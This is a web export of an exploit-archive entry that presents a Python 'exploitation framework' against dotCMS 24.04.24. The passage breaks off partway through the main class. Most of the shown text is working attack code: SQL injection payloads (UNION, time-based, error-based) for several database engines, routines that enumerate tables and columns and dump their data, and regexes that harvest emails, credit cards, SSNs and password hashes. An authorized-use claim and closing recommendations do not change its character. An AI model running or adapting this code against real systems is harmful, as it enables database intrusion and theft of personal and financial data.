{"id":30773,"date":"2025-12-12T11:58:44","date_gmt":"2025-12-12T11:58:44","guid":{"rendered":"http:\/\/localhost\/?p=30773"},"modified":"2025-12-12T11:58:44","modified_gmt":"2025-12-12T11:58:44","slug":"dotcms-240424-vulnerability-scanner","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=30773","title":{"rendered":"\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner_PACKETSTORM:212770"},"content":{"rendered":"

{“lastseen”:”2025-12-12T17:15:30″,”description”:”dotCMS version 24.04.24 advanced exploitation python scanning script that looks for local file inclusion, data exposure, SQL injection, and more…”,”published”:”2025-12-12T00:00:00″,”modified”:”2025-12-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 dotCMS 24.04.24 Vulnerability Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:212770″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : dotCMS v24.04.24 lts v23 Advanced Exploitation Framework |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/github.com\/dotCMS\/core\/releases\/tag\/v24.04.24_lts_v23 |\\n =============================================================================================================================================\\n \\n [+] References : \\n \\n [+] Summary : This Python-based framework is designed for authorized penetration testing of DotCMS applications. It provides a comprehensive exploitation workflow, including:\\n \\n Evidence Collection: Stores requests, responses, and screenshots in a SQLite database.\\n \\n Reconnaissance: Checks TLS\/SSL, analyzes CORS settings, and asynchronously discovers endpoints.\\n \\n Vulnerability Assessment: Performs advanced SQL Injection testing (Time-Based, Error-Based, Boolean-Based, Union-Based).\\n \\n Exploitation: Extracts user data, hunts for JWT tokens, and tests for file inclusion (LFI) vulnerabilities.\\n \\n Post-Exploitation: Dumps configuration files and identifies sensitive data leaks.\\n \\n Reporting: Generates detailed penetration testing reports and execution statistics.\\n \\n [+] Key Features:\\n \\n Asynchronous and synchronous scanning.\\n \\n PoC evidence storage and logging.\\n \\n Supports extraction of users, JWTs, and sensitive configuration files.\\n \\n Generates professional reports with recommendations.\\n \\n Legal-use enforcement with explicit authorization confirmation.\\n \\t\\n [+] Usage : * : Save as: poc.py\\n Run : python poc.php -t 127.0.0.1\\n \\t\\t\\t\\t \\n \\n python3 poc.py -t https:\/\/demo.dotcms.com –full\\n \\n # Database Enumeration Only\\n python3 poc.py -t https:\/\/demo.dotcms.com –database\\n \\n # Quick Scan\\n python3 poc.py -t https:\/\/demo.dotcms.com –quick\\n \\t\\n [+] POC :\\t\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n DotCMS Advanced Exploitation Framework – by indoushka\\n \\”\\”\\”\\n \\n import os\\n import sys\\n import json\\n import time\\n import re\\n import argparse\\n import hashlib\\n import base64\\n import sqlite3\\n import asyncio\\n import aiohttp\\n import ssl\\n import socket\\n import csv\\n from datetime import datetime\\n from urllib.parse import urljoin, quote, urlparse\\n from concurrent.futures import ThreadPoolExecutor, as_completed\\n from colorama import init, Fore, Style, Back\\n import warnings\\n warnings.filterwarnings(\\”ignore\\”)\\n \\n init(autoreset=True)\\n \\n class EvidenceCollector:\\n \\”\\”\\”Collects and stores PoC evidence\\”\\”\\”\\n def __init__(self, target):\\n self.target = target\\n timestamp = datetime.now().strftime(‘%Y%m%d_%H%M%S’)\\n self.evidence_dir = f\\”evidence_{timestamp}\\”\\n os.makedirs(self.evidence_dir, exist_ok=True)\\n self.evidence_db = f\\”{self.evidence_dir}\/evidence.db\\”\\n self.init_database()\\n \\n def init_database(self):\\n conn = sqlite3.connect(self.evidence_db)\\n cursor = conn.cursor()\\n cursor.execute(”’\\n CREATE TABLE IF NOT EXISTS evidence (\\n id INTEGER PRIMARY KEY,\\n timestamp TEXT,\\n vulnerability TEXT,\\n endpoint TEXT,\\n payload TEXT,\\n request TEXT,\\n response TEXT,\\n screenshot_path TEXT,\\n severity TEXT,\\n cvss_score REAL,\\n cwe_id INTEGER,\\n verified INTEGER DEFAULT 0\\n )\\n ”’)\\n cursor.execute(”’\\n CREATE TABLE IF NOT EXISTS extracted_data (\\n id INTEGER PRIMARY KEY,\\n timestamp TEXT,\\n data_type TEXT,\\n data_value TEXT,\\n source TEXT,\\n hash TEXT\\n )\\n ”’)\\n conn.commit()\\n conn.close()\\n \\n def add_evidence(self, vuln_type, endpoint, payload, request, response, severity=\\”High\\”, cvss=7.5, cwe=None):\\n conn = sqlite3.connect(self.evidence_db)\\n cursor = conn.cursor()\\n \\n screenshot = f\\”{self.evidence_dir}\/{vuln_type}_{datetime.now().strftime(‘%H%M%S’)}.txt\\”\\n with open(screenshot, ‘w’, encoding=’utf-8′) as f:\\n f.write(f\\”REQUEST:\\\\n{request}\\\\n\\\\nRESPONSE:\\\\n{response}\\”)\\n \\n cursor.execute(”’\\n INSERT INTO evidence \\n (timestamp, vulnerability, endpoint, payload, request, response, screenshot_path, severity, cvss_score, cwe_id)\\n VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\\n ”’, (datetime.now().isoformat(), vuln_type, endpoint, payload, request, response, \\n screenshot, severity, cvss, cwe))\\n \\n evidence_id = cursor.lastrowid\\n conn.commit()\\n conn.close()\\n \\n print(f\\”{Fore.GREEN}[+] Evidence recorded (ID: {evidence_id}) for {vuln_type}\\”)\\n return evidence_id\\n \\n class DatabaseEnumerator:\\n \\”\\”\\”Advanced database enumeration and dumping\\”\\”\\”\\n \\n def __init__(self, exploiter):\\n self.exploiter = exploiter\\n self.db_info = {}\\n self.tables = []\\n self.columns = {}\\n self.data_dumps = {}\\n \\n def identify_database(self, vulnerable_endpoint):\\n \\”\\”\\”Identify database type and version\\”\\”\\”\\n self.exploiter.log(\\”[*] Identifying database type…\\”, ‘info’)\\n \\n identification_payloads = {\\n ‘MySQL’: [\\”‘ AND @@version like ‘%MySQL%’–\\”, \\”‘ AND SLEEP(2)–\\”],\\n ‘PostgreSQL’: [\\”‘ AND version() like ‘%PostgreSQL%’–\\”, \\”‘ AND pg_sleep(2)–\\”],\\n ‘MSSQL’: [\\”‘ AND @@version like ‘%Microsoft%’–\\”, \\”‘ AND WAITFOR DELAY ’00:00:02’–\\”],\\n ‘Oracle’: [\\”‘ AND (SELECT banner FROM v$version) like ‘%Oracle%’–\\”, \\n \\”‘ AND dbms_pipe.receive_message((‘a’),2)–\\”]\\n }\\n \\n for db_type, payloads in identification_payloads.items():\\n for payload in payloads:\\n try:\\n start_time = time.time()\\n response = self.exploiter.session.get(\\n urljoin(self.exploiter.target, vulnerable_endpoint),\\n params={‘filter’: payload},\\n timeout=10\\n )\\n elapsed = time.time() – start_time\\n \\n # Time-based detection\\n if ‘sleep’ in payload.lower() or ‘waitfor’ in payload.lower():\\n if elapsed \\u003e 1.5:\\n self.db_info[‘type’] = db_type\\n self.exploiter.log(f\\”[+] Database identified as: {db_type}\\”, ‘success’)\\n break\\n \\n # Error\/response based detection\\n if db_type == ‘MySQL’ and ‘MySQL’ in response.text:\\n self.db_info[‘type’] = db_type\\n break\\n elif db_type == ‘PostgreSQL’ and ‘PostgreSQL’ in response.text:\\n self.db_info[‘type’] = db_type\\n break\\n elif db_type == ‘MSSQL’ and ‘Microsoft’ in response.text:\\n self.db_info[‘type’] = db_type\\n break\\n \\n except Exception as e:\\n continue\\n \\n if ‘type’ in self.db_info:\\n break\\n \\n if ‘type’ not in self.db_info:\\n self.exploiter.log(\\”[-] Could not identify database type\\”, ‘warning’)\\n self.db_info[‘type’] = ‘Unknown’\\n \\n # Try to get version\\n self.get_database_version(vulnerable_endpoint)\\n return self.db_info\\n \\n def get_database_version(self, vulnerable_endpoint):\\n \\”\\”\\”Get database version\\”\\”\\”\\n version_payloads = {\\n ‘MySQL’: \\”‘ UNION SELECT @@version,NULL,NULL–\\”,\\n ‘PostgreSQL’: \\”‘ UNION SELECT version(),NULL,NULL–\\”,\\n ‘MSSQL’: \\”‘ UNION SELECT @@version,NULL,NULL–\\”,\\n ‘Oracle’: \\”‘ UNION SELECT banner FROM v$version WHERE rownum=1–\\”\\n }\\n \\n if self.db_info.get(‘type’) in version_payloads:\\n payload = version_payloads[self.db_info[‘type’]]\\n try:\\n response = self.exploiter.session.get(\\n urljoin(self.exploiter.target, vulnerable_endpoint),\\n params={‘filter’: payload},\\n timeout=10\\n )\\n \\n # Extract version from response\\n version_patterns = [\\n r’\\\\d+\\\\.\\\\d+\\\\.\\\\d+’,\\n r’PostgreSQL \\\\d+\\\\.\\\\d+’,\\n r’Microsoft SQL Server \\\\d{4}’,\\n r’Oracle Database \\\\d+g’\\n ]\\n \\n for pattern in version_patterns:\\n match = re.search(pattern, response.text)\\n if match:\\n self.db_info[‘version’] = match.group()\\n self.exploiter.log(f\\”[+] Database version: {self.db_info[‘version’]}\\”, ‘success’)\\n break\\n \\n except Exception as e:\\n self.exploiter.log(f\\”[-] Failed to get version: {str(e)}\\”, ‘error’)\\n \\n def enumerate_tables(self, vulnerable_endpoint, limit=50):\\n \\”\\”\\”Enumerate database tables\\”\\”\\”\\n self.exploiter.log(f\\”[*] Enumerating database tables (limit: {limit})…\\”, ‘info’)\\n \\n table_payloads = {\\n ‘MySQL’: [\\n f\\”‘ UNION SELECT table_name,NULL,NULL FROM information_schema.tables LIMIT {limit}–\\”,\\n f\\”‘ UNION SELECT table_schema,table_name,NULL FROM information_schema.tables LIMIT {limit}–\\”\\n ],\\n ‘PostgreSQL’: [\\n f\\”‘ UNION SELECT tablename,NULL,NULL FROM pg_tables LIMIT {limit}–\\”,\\n f\\”‘ UNION SELECT schemaname,tablename,NULL FROM pg_tables LIMIT {limit}–\\”\\n ],\\n ‘MSSQL’: [\\n f\\”‘ UNION SELECT table_name,NULL,NULL FROM information_schema.tables–\\”,\\n f\\”‘ UNION SELECT table_schema,table_name,NULL FROM information_schema.tables–\\”\\n ]\\n }\\n \\n tables = []\\n \\n if self.db_info.get(‘type’) in table_payloads:\\n for payload in table_payloads[self.db_info[‘type’]][:2]:\\n try:\\n response = self.exploiter.session.get(\\n urljoin(self.exploiter.target, vulnerable_endpoint),\\n params={‘filter’: payload},\\n timeout=15\\n )\\n \\n # Extract table names – looking for patterns\\n table_patterns = [\\n r'[a-zA-Z_][a-zA-Z0-9_]*’,\\n r’user[s_]?’, r’admin[s_]?’, r’passw(or)?d’, r’credit’, r’account’,\\n r’customer’, r’client’, r’order’, r’transaction’, r’payment’,\\n r’config’, r’setting’, r’log’, r’audit’, r’session’,\\n r’token’, r’api’, r’key’, r’secret’\\n ]\\n \\n # Find potential table names\\n for pattern in table_patterns:\\n matches = re.findall(pattern, response.text, re.IGNORECASE)\\n for match in matches:\\n if len(match) \\u003e 3 and match.lower() not in [‘null’, ‘select’, ‘union’, ‘from’]:\\n if match not in tables:\\n tables.append(match)\\n if len(tables) \\u003e= limit:\\n break\\n \\n if len(tables) \\u003e= limit:\\n break\\n \\n if tables:\\n break\\n \\n except Exception as e:\\n self.exploiter.log(f\\”[-] Table enumeration failed: {str(e)}\\”, ‘error’)\\n \\n # Clean and deduplicate\\n tables = list(set([t for t in tables if isinstance(t, str)]))\\n tables.sort()\\n \\n self.tables = tables[:limit]\\n \\n if self.tables:\\n self.exploiter.log(f\\”[+] Found {len(self.tables)} potential tables:\\”, ‘success’)\\n for i, table in enumerate(self.tables[:20], 1):\\n self.exploiter.log(f\\” {i:2}. {table}\\”, ‘success’)\\n \\n # Save tables list\\n with open(f\\”{self.exploiter.results_dir}\/database_tables.json\\”, ‘w’) as f:\\n json.dump(self.tables, f, indent=2)\\n \\n return self.tables\\n \\n def enumerate_columns(self, vulnerable_endpoint, table_name):\\n \\”\\”\\”Enumerate columns for a specific table\\”\\”\\”\\n self.exploiter.log(f\\”[*] Enumerating columns for table: {table_name}\\”, ‘info’)\\n \\n column_payloads = {\\n ‘MySQL’: [\\n f\\”‘ UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}’–\\”,\\n f\\”‘ UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}’–\\”\\n ],\\n ‘PostgreSQL’: [\\n f\\”‘ UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}’–\\”,\\n f\\”‘ UNION SELECT column_name,data_type,NULL FROM information_schema.columns WHERE table_name='{table_name}’–\\”\\n ],\\n ‘MSSQL’: [\\n f\\”‘ UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='{table_name}’–\\”\\n ]\\n }\\n \\n columns = []\\n \\n if self.db_info.get(‘type’) in column_payloads:\\n for payload in column_payloads[self.db_info[‘type’]][:2]:\\n try:\\n response = self.exploiter.session.get(\\n urljoin(self.exploiter.target, vulnerable_endpoint),\\n params={‘filter’: payload},\\n timeout=15\\n )\\n \\n # Look for column name patterns\\n column_patterns = [\\n r'[a-zA-Z_][a-zA-Z0-9_]*’,\\n r’user’, r’pass’, r’email’, r’name’, r’address’,\\n r’phone’, r’credit’, r’card’, r’account’,\\n r’token’, r’session’, r’key’, r’secret’,\\n r’salary’, r’price’, r’amount’, r’balance’,\\n r’birth’, r’ssn’, r’social’, r’security’,\\n r’ip’, r’mac’, r’device’, r’browser’\\n ]\\n \\n for pattern in column_patterns:\\n matches = re.findall(pattern, response.text, re.IGNORECASE)\\n for match in matches:\\n if len(match) \\u003e 2 and match.lower() not in [‘null’, ‘select’, ‘union’, ‘from’, ‘where’]:\\n if match not in columns:\\n columns.append(match)\\n \\n if columns:\\n break\\n \\n except Exception as e:\\n self.exploiter.log(f\\”[-] Column enumeration failed: {str(e)}\\”, ‘error’)\\n \\n # Clean and deduplicate\\n columns = list(set([c for c in columns if isinstance(c, str)]))\\n columns.sort()\\n \\n self.columns[table_name] = columns\\n \\n if columns:\\n self.exploiter.log(f\\”[+] Found {len(columns)} potential columns for {table_name}:\\”, ‘success’)\\n for i, col in enumerate(columns[:15], 1):\\n self.exploiter.log(f\\” {i:2}. {col}\\”, ‘success’)\\n \\n return columns\\n \\n def dump_table_data(self, vulnerable_endpoint, table_name, columns=None, limit=100):\\n \\”\\”\\”Dump data from specific table\\”\\”\\”\\n self.exploiter.log(f\\”[*] Dumping data from table: {table_name} (limit: {limit})\\”, ‘info’)\\n \\n if not columns and table_name in self.columns:\\n columns = self.columns[table_name]\\n \\n if not columns:\\n self.exploiter.log(f\\”[-] No columns found for table {table_name}\\”, ‘warning’)\\n columns = [‘*’]\\n \\n # Build column string\\n if columns == [‘*’]:\\n col_string = ‘*’\\n else:\\n # Take first 5 columns for initial dump\\n col_string = ‘,’.join(columns[:5])\\n \\n dump_payloads = {\\n ‘MySQL’: [\\n f\\”‘ UNION SELECT {col_string} FROM {table_name} LIMIT {limit}–\\”,\\n f\\”‘ UNION SELECT CONCAT_WS(‘|’,{col_string}) FROM {table_name} LIMIT {limit}–\\”\\n ],\\n ‘PostgreSQL’: [\\n f\\”‘ UNION SELECT {col_string} FROM {table_name} LIMIT {limit}–\\”,\\n f\\”‘ UNION SELECT {col_string}||’|’ FROM {table_name} LIMIT {limit}–\\”\\n ],\\n ‘MSSQL’: [\\n f\\”‘ UNION SELECT {col_string} FROM {table_name}–\\”,\\n f\\”‘ UNION SELECT {col_string}+’|’ FROM {table_name}–\\”\\n ]\\n }\\n \\n dumped_data = []\\n \\n if self.db_info.get(‘type’) in dump_payloads:\\n for payload in dump_payloads[self.db_info[‘type’]][:2]:\\n try:\\n response = self.exploiter.session.get(\\n urljoin(self.exploiter.target, vulnerable_endpoint),\\n params={‘filter’: payload},\\n timeout=20\\n )\\n \\n # Extract data – look for structured patterns\\n data_patterns = [\\n # Email patterns\\n r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,}’,\\n # Phone numbers\\n r'[\\\\+]?[(]?[0-9]{3}[)]?[-\\\\s\\\\.]?[0-9]{3}[-\\\\s\\\\.]?[0-9]{4,6}’,\\n # Credit cards\\n r’\\\\b(?:\\\\d[ -]*?){13,16}\\\\b’,\\n # Dates\\n r’\\\\d{1,2}[\/-]\\\\d{1,2}[\/-]\\\\d{2,4}’,\\n # URLs\\n r’https?:\/\/[^\\\\s\\u003c\\u003e\\”\\\\’]+’,\\n # IP addresses\\n r’\\\\b(?:\\\\d{1,3}\\\\.){3}\\\\d{1,3}\\\\b’,\\n # Social security\\n r’\\\\d{3}-\\\\d{2}-\\\\d{4}’,\\n # Passwords\/Hashes\\n r’\\\\$2[ay]\\\\$\\\\d+\\\\$[a-zA-Z0-9.\/]+’, # bcrypt\\n r'[a-fA-F0-9]{32}’, # MD5\\n r'[a-fA-F0-9]{40}’, # SHA1\\n r'[a-fA-F0-9]{64}’, # SHA256\\n ]\\n \\n # Also look for pipe-separated data (common in dumps)\\n lines = response.text.split(‘\\\\n’)\\n for line in lines:\\n if ‘|’ in line and len(line.strip()) \\u003e 5:\\n parts = line.split(‘|’)\\n if len(parts) \\u003e= len(columns[:5]):\\n record = {}\\n for i, part in enumerate(parts[:len(columns[:5])]):\\n if i \\u003c len(columns[:5]):\\n record[columns[i] if i \\u003c len(columns) else f’col_{i}’] = part.strip()\\n if record:\\n dumped_data.append(record)\\n \\n # Look for patterns\\n for pattern in data_patterns:\\n matches = re.findall(pattern, line)\\n for match in matches:\\n if len(match) \\u003e 3:\\n if not any(match in str(d) for d in dumped_data):\\n dumped_data.append({‘extracted_data’: match, ‘source’: line[:50]})\\n \\n if dumped_data:\\n break\\n \\n except Exception as e:\\n self.exploiter.log(f\\”[-] Data dump failed: {str(e)}\\”, ‘error’)\\n \\n # Save dumped data\\n if dumped_data:\\n self.data_dumps[table_name] = dumped_data[:limit]\\n \\n # Save to JSON\\n json_file = f\\”{self.exploiter.results_dir}\/dump_{table_name}.json\\”\\n with open(json_file, ‘w’, encoding=’utf-8′) as f:\\n json.dump(dumped_data, f, indent=2, default=str)\\n \\n # Save to CSV if structured data\\n csv_file = f\\”{self.exploiter.results_dir}\/dump_{table_name}.csv\\”\\n try:\\n if all(isinstance(d, dict) for d in dumped_data):\\n keys = set()\\n for record in dumped_data:\\n keys.update(record.keys())\\n \\n with open(csv_file, ‘w’, newline=”, encoding=’utf-8′) as f:\\n writer = csv.DictWriter(f, fieldnames=list(keys))\\n writer.writeheader()\\n writer.writerows(dumped_data)\\n except:\\n pass\\n \\n self.exploiter.log(f\\”[+] Dumped {len(dumped_data)} records from {table_name}\\”, ‘success’)\\n self.exploiter.log(f\\”[+] Data saved to: {json_file}\\”, ‘success’)\\n \\n # Display sample\\n self.exploiter.log(f\\”[*] Sample data from {table_name}:\\”, ‘info’)\\n for i, record in enumerate(dumped_data[:3], 1):\\n self.exploiter.log(f\\” Record {i}: {str(record)[:100]}…\\”, ‘info’)\\n \\n return dumped_data\\n \\n def search_cleartext_data(self, vulnerable_endpoint, search_terms=None):\\n \\”\\”\\”Search for cleartext sensitive data across database\\”\\”\\”\\n self.exploiter.log(\\”[*] Searching for cleartext sensitive data…\\”, ‘info’)\\n \\n if not search_terms:\\n search_terms = [\\n ‘password’, ‘passwd’, ‘pwd’, ‘secret’, ‘token’, ‘key’,\\n ‘credit’, ‘card’, ‘account’, ‘ssn’, ‘social’, ‘security’,\\n ‘salary’, ‘income’, ‘balance’, ‘address’, ‘phone’,\\n ’email’, ‘username’, ‘login’, ‘admin’, ‘root’\\n ]\\n \\n found_data = {}\\n \\n for term in search_terms:\\n self.exploiter.log(f\\”[*] Searching for: {term}\\”, ‘info’)\\n \\n search_payloads = {\\n ‘MySQL’: [\\n f\\”‘ UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE ‘%{term}%’–\\”,\\n f\\”‘ UNION SELECT CONCAT(table_name,’.’,column_name),NULL,NULL FROM information_schema.columns WHERE column_name LIKE ‘%{term}%’–\\”\\n ],\\n ‘PostgreSQL’: [\\n f\\”‘ UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE ‘%{term}%’–\\”\\n ],\\n ‘MSSQL’: [\\n f\\”‘ UNION SELECT table_name,column_name,NULL FROM information_schema.columns WHERE column_name LIKE ‘%{term}%’–\\”\\n ]\\n }\\n \\n if self.db_info.get(‘type’) in search_payloads:\\n for payload in search_payloads[self.db_info[‘type’]][:2]:\\n try:\\n response = self.exploiter.session.get(\\n urljoin(self.exploiter.target, vulnerable_endpoint),\\n params={‘filter’: payload},\\n timeout=15\\n )\\n \\n # Look for table.column patterns\\n patterns = [\\n rf'{term}’,\\n rf'[a-zA-Z_][a-zA-Z0-9_]*{term}[a-zA-Z0-9_]*’,\\n rf'[a-zA-Z_][a-zA-Z0-9_]*\\\\.{term}[a-zA-Z0-9_]*’\\n ]\\n \\n for pattern in patterns:\\n matches = re.findall(pattern, response.text, re.IGNORECASE)\\n for match in matches:\\n if match not in found_data:\\n found_data[match] = term\\n \\n if term in found_data:\\n break\\n \\n except Exception as e:\\n continue\\n \\n # Try to extract actual data from found columns\\n extracted_cleartext = {}\\n \\n for column_ref in found_data.keys():\\n if ‘.’ in column_ref:\\n table, column = column_ref.split(‘.’, 1)\\n \\n # Try to extract data from this column\\n extract_payload = {\\n ‘MySQL’: f\\”‘ UNION SELECT {column} FROM {table} LIMIT 10–\\”,\\n ‘PostgreSQL’: f\\”‘ UNION SELECT {column} FROM {table} LIMIT 10–\\”,\\n ‘MSSQL’: f\\”‘ UNION SELECT {column} FROM {table}–\\”\\n }\\n \\n if self.db_info.get(‘type’) in extract_payload:\\n try:\\n response = self.exploiter.session.get(\\n urljoin(self.exploiter.target, vulnerable_endpoint),\\n params={‘filter’: extract_payload[self.db_info[‘type’]]},\\n timeout=15\\n )\\n \\n # Look for non-hash, non-null values\\n lines = response.text.split(‘\\\\n’)\\n for line in lines:\\n line = line.strip()\\n if (len(line) \\u003e 3 and \\n len(line) \\u003c 100 and \\n not line.startswith(‘$2′) and # Not bcrypt\\n not re.match(r’^[a-fA-F0-9]{32,128}$’, line)): # Not hash\\n \\n if column not in extracted_cleartext:\\n extracted_cleartext[column] = []\\n \\n if line not in extracted_cleartext[column]:\\n extracted_cleartext[column].append(line)\\n \\n except Exception as e:\\n continue\\n \\n # Save results\\n if found_data or extracted_cleartext:\\n results = {\\n ‘sensitive_columns’: found_data,\\n ‘cleartext_data’: extracted_cleartext\\n }\\n \\n results_file = f\\”{self.exploiter.results_dir}\/cleartext_search.json\\”\\n with open(results_file, ‘w’, encoding=’utf-8′) as f:\\n json.dump(results, f, indent=2)\\n \\n # Display findings\\n if found_data:\\n self.exploiter.log(\\”[+] Found sensitive columns:\\”, ‘success’)\\n for col in list(found_data.keys())[:10]:\\n self.exploiter.log(f\\” \u2022 {col}\\”, ‘success’)\\n \\n if extracted_cleartext:\\n self.exploiter.log(\\”[+] Found cleartext data:\\”, ‘success’)\\n for col, data in extracted_cleartext.items():\\n self.exploiter.log(f\\” \u2022 {col}: {data[:3]}…\\”, ‘success’)\\n \\n return found_data, extracted_cleartext\\n \\n def comprehensive_database_dump(self, vulnerable_endpoint):\\n \\”\\”\\”Perform comprehensive database dump\\”\\”\\”\\n self.exploiter.log(\\”\\\\n\\” + \\”=\\”*80, ‘info’)\\n self.exploiter.log(\\”COMPREHENSIVE DATABASE DUMP\\”, ‘section’)\\n self.exploiter.log(\\”=\\”*80, ‘info’)\\n \\n # Step 1: Identify database\\n db_info = self.identify_database(vulnerable_endpoint)\\n \\n # Step 2: Enumerate tables\\n tables = self.enumerate_tables(vulnerable_endpoint, limit=30)\\n \\n # Step 3: For each interesting table, enumerate columns and dump data\\n interesting_tables = []\\n interesting_patterns = [\\n ‘user’, ‘admin’, ‘pass’, ‘account’, ‘customer’, \\n ‘client’, ‘order’, ‘payment’, ‘credit’, ‘card’,\\n ‘config’, ‘setting’, ‘token’, ‘session’, ‘log’\\n ]\\n \\n for table in tables:\\n for pattern in interesting_patterns:\\n if pattern in table.lower():\\n interesting_tables.append(table)\\n break\\n \\n # Also take some random tables if not enough interesting ones\\n if len(interesting_tables) \\u003c 5 and len(tables) \\u003e 5:\\n interesting_tables.extend([t for t in tables if t not in interesting_tables][:5])\\n \\n # Step 4: Dump data from interesting tables\\n all_dumped_data = {}\\n \\n for table in interesting_tables[:10]: # Limit to 10 tables\\n try:\\n # Enumerate columns\\n columns = self.enumerate_columns(vulnerable_endpoint, table)\\n \\n # Dump data\\n if columns:\\n data = self.dump_table_data(vulnerable_endpoint, table, columns, limit=50)\\n if data:\\n all_dumped_data[table] = data\\n \\n time.sleep(1) # Rate limiting\\n \\n except Exception as e:\\n self.exploiter.log(f\\”[-] Failed to dump {table}: {str(e)}\\”, ‘error’)\\n \\n # Step 5: Search for cleartext data\\n sensitive_cols, cleartext_data = self.search_cleartext_data(vulnerable_endpoint)\\n \\n # Step 6: Generate database report\\n self.generate_database_report(db_info, tables, all_dumped_data, sensitive_cols, cleartext_data)\\n \\n return {\\n ‘database_info’: db_info,\\n ‘tables’: tables,\\n ‘dumped_data’: all_dumped_data,\\n ‘sensitive_columns’: sensitive_cols,\\n ‘cleartext_data’: cleartext_data\\n }\\n \\n def generate_database_report(self, db_info, tables, dumped_data, sensitive_cols, cleartext_data):\\n \\”\\”\\”Generate comprehensive database report\\”\\”\\”\\n report = f\\”\\”\\”\\n {‘=’*80}\\n DATABASE PENETRATION TEST REPORT\\n {‘=’*80}\\n \\n Database Type: {db_info.get(‘type’, ‘Unknown’)}\\n Database Version: {db_info.get(‘version’, ‘Unknown’)}\\n Total Tables Found: {len(tables)}\\n Tables Dumped: {len(dumped_data)}\\n Sensitive Columns: {len(sensitive_cols)}\\n Cleartext Data Found: {sum(len(v) for v in cleartext_data.values())}\\n \\n TABLE ENUMERATION\\n {‘-‘*80}\\n \\”\\”\\”\\n \\n for i, table in enumerate(tables[:50], 1):\\n report += f\\”{i:3}. {table}\\\\n\\”\\n \\n report += f\\”\\”\\”\\n DATA DUMP SUMMARY\\n {‘-‘*80}\\n \\”\\”\\”\\n \\n for table, data in dumped_data.items():\\n report += f\\”\\\\n{table}:\\\\n\\”\\n report += f\\” Records dumped: {len(data)}\\\\n\\”\\n if data and isinstance(data[0], dict):\\n sample_keys = list(data[0].keys())[:3]\\n report += f\\” Sample columns: {‘, ‘.join(sample_keys)}\\\\n\\”\\n \\n # Show sample data\\n if data:\\n report += f\\” Sample record: {str(data[0])[:100]}…\\\\n\\”\\n \\n report += f\\”\\”\\”\\n SENSITIVE COLUMNS FOUND\\n {‘-‘*80}\\n \\”\\”\\”\\n \\n for col, term in list(sensitive_cols.items())[:20]:\\n report += f\\”\u2022 {col} (contains: {term})\\\\n\\”\\n \\n report += f\\”\\”\\”\\n CLEARTEXT DATA DISCOVERED\\n {‘-‘*80}\\n \\”\\”\\”\\n \\n for column, values in cleartext_data.items():\\n report += f\\”\\\\n{column}:\\\\n\\”\\n for value in values[:5]:\\n report += f\\” \u2022 {value}\\\\n\\”\\n if len(values) \\u003e 5:\\n report += f\\” … and {len(values) – 5} more\\\\n\\”\\n \\n report += f\\”\\”\\”\\n SECURITY FINDINGS\\n {‘-‘*80}\\n 1. Database exposed via SQL injection\\n 2. {len(sensitive_cols)} sensitive columns identified\\n 3. {sum(len(v) for v in cleartext_data.values())} cleartext sensitive values found\\n 4. {len(dumped_data)} tables successfully dumped\\n \\n RECOMMENDATIONS\\n {‘-‘*80}\\n 1. Immediate patch of SQL injection vulnerabilities\\n 2. Encrypt all sensitive data at rest\\n 3. Implement proper access controls to database\\n 4. Conduct security audit of all database queries\\n 5. Implement database activity monitoring\\n 6. Rotate all exposed credentials immediately\\n \\n {‘=’*80}\\n END OF DATABASE REPORT\\n {‘=’*80}\\n \\”\\”\\”\\n \\n report_file = f\\”{self.exploiter.results_dir}\/database_penetration_report.txt\\”\\n with open(report_file, ‘w’, encoding=’utf-8′) as f:\\n f.write(report)\\n \\n self.exploiter.log(f\\”[+] Database report generated: {report_file}\\”, ‘success’)\\n \\n # Also save comprehensive JSON\\n comprehensive_data = {\\n ‘database_info’: db_info,\\n ‘all_tables’: tables,\\n ‘dumped_tables’: list(dumped_data.keys()),\\n ‘sensitive_columns’: sensitive_cols,\\n ‘cleartext_data’: cleartext_data,\\n ‘dump_summary’: {table: len(data) for table, data in dumped_data.items()}\\n }\\n \\n json_file = f\\”{self.exploiter.results_dir}\/database_comprehensive.json\\”\\n with open(json_file, ‘w’, encoding=’utf-8′) as f:\\n json.dump(comprehensive_data, f, indent=2)\\n \\n return report\\n \\n # \u0625\u0636\u0627\u0641\u0629 \u062f\u0648\u0627\u0644 \u062c\u062f\u064a\u062f\u0629 \u0625\u0644\u0649 \u0643\u0644\u0627\u0633 DotCMSExploiter \u0627\u0644\u0631\u0626\u064a\u0633\u064a\\n class DotCMSExploiter:\\n \\”\\”\\”Main exploitation class – Enhanced with Database Enumeration\\”\\”\\”\\n \\n def __init__(self, target):\\n self.target = target.rstrip(‘\/’)\\n self.evidence = EvidenceCollector(target)\\n self.db_enumerator = DatabaseEnumerator(self) # Initialize DB enumerator\\n \\n # Statistics\\n self.stats = {\\n ‘vulnerabilities’: 0,\\n ‘users_extracted’: 0,\\n ‘tokens_found’: 0,\\n ‘databases_found’: 0,\\n ‘files_leaked’: 0,\\n ‘tables_enumerated’: 0,\\n ‘records_dumped’: 0\\n }\\n \\n # Create results directory\\n timestamp = datetime.now().strftime(‘%Y%m%d_%H%M%S’)\\n self.results_dir = f\\”results_{timestamp}\\”\\n os.makedirs(self.results_dir, exist_ok=True)\\n \\n # Setup session\\n import requests\\n self.session = requests.Session()\\n self.session.verify = False\\n self.session.timeout = 30\\n self.session.headers.update({\\n ‘User-Agent’: ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n 